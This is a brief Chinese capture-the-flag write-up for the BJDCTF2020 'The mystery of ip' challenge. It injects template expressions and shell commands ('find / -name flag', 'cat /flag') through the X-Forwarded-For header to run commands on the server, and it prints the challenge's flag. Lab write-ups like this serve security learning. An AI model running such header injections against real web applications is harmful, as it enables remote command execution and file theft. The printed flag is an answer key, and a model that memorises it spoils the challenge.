码迷,mamicode.com
首页 > 其他好文 > 详细

[BJDCTF2020]The mystery of ip

时间:2020-12-15 12:36:09      阅读:3      评论:0      收藏:0      [点我收藏+]

标签:flag   查看   head   https   bsp   The   tps   hub   xxxxxx   

https://github.com/BjdsecCA/BJDCTF2020

 

打开后发现有Flag和Hint两个页面,查看Flag页面,提示"Your IP is : xxxxxx"

添加Header: X-Forwarded_For: 127.0.0.1,返回"Your IP is : 127.0.0.1"

修改X-Forwarded-For: {{7*7}},返回"Your IP is : 49"

修改X-Forwarded-For: {{‘find / -name flag‘}},得知flag在/flag

修改X-Forwarded-For: {{‘cat /flag‘}},得到flag:

flag{e16e8c7e-989c-4b28-950a-13c1ad51ba51}

[BJDCTF2020]The mystery of ip

标签:flag   查看   head   https   bsp   The   tps   hub   xxxxxx   

原文地址:https://www.cnblogs.com/hktk1643/p/14111742.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!